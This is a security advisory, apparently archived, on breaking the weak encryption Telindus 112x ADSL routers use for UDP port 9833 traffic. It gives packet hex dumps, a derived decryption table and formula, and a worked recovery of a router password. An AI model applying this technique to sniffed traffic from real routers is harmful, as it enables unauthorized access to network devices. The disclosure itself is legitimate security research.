|
COMMAND Telindus password recovery due to weak encryption scheme SYSTEMS AFFECTED Telindus ADSL router 112x, firmware release 6.0.x PROBLEM In Elia Florio "ioProgrammo" [http://www.edmaster.it/ioprogrammo] [eflorio@edmaster.it] advisory : An old security problem for Telindus 112x series (and Arescom NetDSL 1000 too) is well documented here: http://www.tigerteam.it/files/telindus-advisory.txt (english) http://www.tigerteam.it/files/telindus-advisory.IT.txt (italian) There is a new exploit to crack router password, partially-based on this old problem, which was fixed by Telindus introducing a new firmware release (6.0.x), where UDP packets over 9833 port (containing plain-text password) are encrypted, to ensure product security. However, after some studies, I discovered that the encryption scheme is trivial and can be broken using some information which the router itself reveals (the router name) to the user. NOTE: The encryption scheme was succesfully decrypted on 2 routers carried by different ISP : MATAV (Hungary) and Telecom (Italy), both with 6.0.x firmware. [---------------------------------------------------------------------] PROOF OF CONCEPT: Using a sniffer I capture a packet (encrypted) from a 1124 router and compare it with another packet (unencrypted) taken from another router, with has the old firmware (< 6.0.x). This procedure (how-to-capture- packet) was explained in a previous security advisory (by others) and is based on UDP sniffing over the 9833 port while "Telindus 9100 M. Application" is trying to contact the router over the LAN. CYPHER-TEXT 0100 00 03 02 00 08 00 00 A2 A3 2B 63 4B 73 23 AB 99 .......¢£+cKs#«TM 0110 02 0A 22 9A 61 02 93 7B AB A3 2B 90 08 08 00 2B .."sa."{«£+·...+ 0120 6B 7B AB 9B 28 08 10 01 92 72 22 99 89 91 B1 82 k{«>(...'r"TM`±, 0130 42 29 6A A2 62 49 61 03 B3 2B 91 01 B1 71 81 71 B)j¢bIa.³+`.±q·q 0140 91 B9 DA A3 AB 29 02 53 AB 61 01 99 81 01 89 C9 `¹Ú£«).S«a.TM·.É 0150 D1 89 B1 D1 99 B1 01 91 81 81 90 09 98 00 10 01 ѱÑTM±.`···.~... 0160 E0 08 98 00 30 00 2E C0 9F 0A 88 08 B0 00 30 00 à.~.0..ÀY.^.°.0. 0170 85 38 9A 64 0A 00 18 00 10 00 02 00 20 00 10 00 ...8sd........ .. 0180 00 09 30 00 00 09 38 00 00 09 40 00 00 09 80 00 ..0...8...@.... 0190 10 00 10 0A 20 00 00 08 20 00 10 00 00 10 50 00 .... ... .....P. 01A0 10 00 00 0A 30 00 10 00 00 0A 48 00 20 00 00 00 ....0.....H. ... 01B0 00 0A 88 00 02 10 28 00 02 11 10 00 00 20 40 00 ..^...(...... @. PLAIN-TEXT 0100 00 03 00 01 01 00 00 05-44 53 4C 30 30 01 01 00 ........DSL00... 0110 0D 31 31 31 31 31 31 31-31 31 31 31 31 31 01 02 .1111111111111.. 0120 00 32 4E 44 31 30 36 30-56 45 2D 54 4C 49 2C 20 .2ND1060VE-TLI, 0130 76 65 72 20 35 2E 33 2E-31 31 42 3B 54 68 75 20 ver 5.3.11B;Thu 0140 44 65 63 20 20 36 20 31-36 3A 33 36 3A 33 33 20 Dec 6 16:36:33 0150 32 30 30 31 01 33 00 02-00 3C 01 13 00 06 00 60 2001.3...<.....` 0160 6C 1D BD 7E 01 16 00 06-00 00 86 60 62 F7 04 08 l..~.......`b... 0170 00 02 00 01 04 15 00 02-00 FF 01 0D 00 04 00 00 ................ 0180 00 00 01 0E 00 04 00 00-00 00 01 14 00 02 00 00 ................ 0190 40 03 00 02 00 00 40 04-00 02 00 00 01 26 00 00 @.....@......&.. 01A0 01 27 00 00 01 28 00 00-01 30 00 02 00 02 01 44 .'...(...0.....D 01B0 00 00 42 05 00 00 42 22-00 00 04 18 00 00 08 FF ..B...B"........ Both payloads begin with "00 03 xx xx xx 00 00" bytes sequence. In the plain packet we can read the router name and the password: the beginning of a text string has an important byte, which stores the string length: 05-44 53 4C 30 30 01 01 00 ^^----------------------------------> lenght of string "DSL00" 0D 31 31 31 31 31 31 31-31 31 31 31 31 31 01 02 00 ^^----------------------------------> lenght of string "1111111111111" I suppose that "0x 0x 00" is a kind of termination sequence for <router name> and <password> fields. Now look at the encrypted packet: because the total length is similar to that of the plain packet (>200 bytes), I suppose that "A2" is now a crypted lenght byte, so the router name field begins after this byte. But I know the router name, because Telindus 9100 M. Application shows it to me during the connection test with router. In this case it was "Telindus ADSL Router",very long! I think that is enough to begin a crypto-analytic attack over the packet. "Telindus ADSL Router" [20 byte = 14hex] crypto-lenght=A2 T e l i n d u s A D S L R o u t e r A3 2B 63 4B 73 23 AB 99 02 0A 22 9A 61 02 93 7B AB A3 2B 90 encrypted 54 65 6C 69 6E 64 75 73 20 41 44 53 4C 20 52 6F 75 74 65 72 plain ASCII Looking this, I try to suppose that: 1) the encryption scheme is based on a fixed crypto system ("e", "u", "t" are encrypted in same way in the text) 2) there is a special encryption for stop/mark bytes between words (add -2 or -3 to final char R=93 / r=90 ????) 3) the encryption scheme is case sensitive Trying to write a crypto table, I can notice that every letter is coded from the previous adding "8" to crypto-byte. For example r=93, then s=9B... CRYPTO TABLE (hex codes) ------------------------------------- CHAR CRYPT PLAIN a 0B 61 b 13 62 c 1B 63 d 23 64 e 2B 65 f 33 66 g 3B 67 h 43 68 i 4B 69 j 53 6A k 5B 6B l 63 6C m 6B 6D n 73 6E o 7B 6F p 83 70 q 8B 71 r 93 72 s 9B 73 t A3 74 u AB 75 v B3 76 w BB 77 y C3 78 x CB 79 z D3 7A ... 1 89 31 2 91 32 3 98 33 ... I think that the encryption function is very similar to this : ENCRYPT(x) = x*8 + int(x/20h) - (int(x/20h))*100h For example ("q" = 71h) ENCRYPT(71h) = 71h*8 + 71h/20h - (71h/20H)*100H = 388 + 3 - 300 = 8Bh There are some encryption variants for blank space, capital and the last letters of words. Now, where is the router password in the encrypted packet? After 20 bytes (the router name length in this case) there is "08 08 00", probably a field marker, then there is 2B, which is the crypto-lentgth of password. The encrypted password-string begins there. Using the table, I can unmask the real router password: m o u s e 2B 6B 7B AB 9B 28 08 10 01 ^^----------------------------------crypto length of password Other informations can be also decrypted : N D S 1 2 6 0 H E - T L I 72 22 99 89 91 B1 82 42 29 6A A2 62 49 61 03 v e r 6 . 0 . 2 7 T u e J u l 3 0 B3 2B 91 01 B1 71 81 71 91 B9 DA A3 AB 29 02 53 AB 61 01 99 81 01 1 9 : 1 6 : 3 6 2 0 0 2 89 C9 D1 89 B1 D1 99 B1 01 91 81 81 90 09 98 00 10 01 [----------------------------------------------------------------------] SOLUTION n/a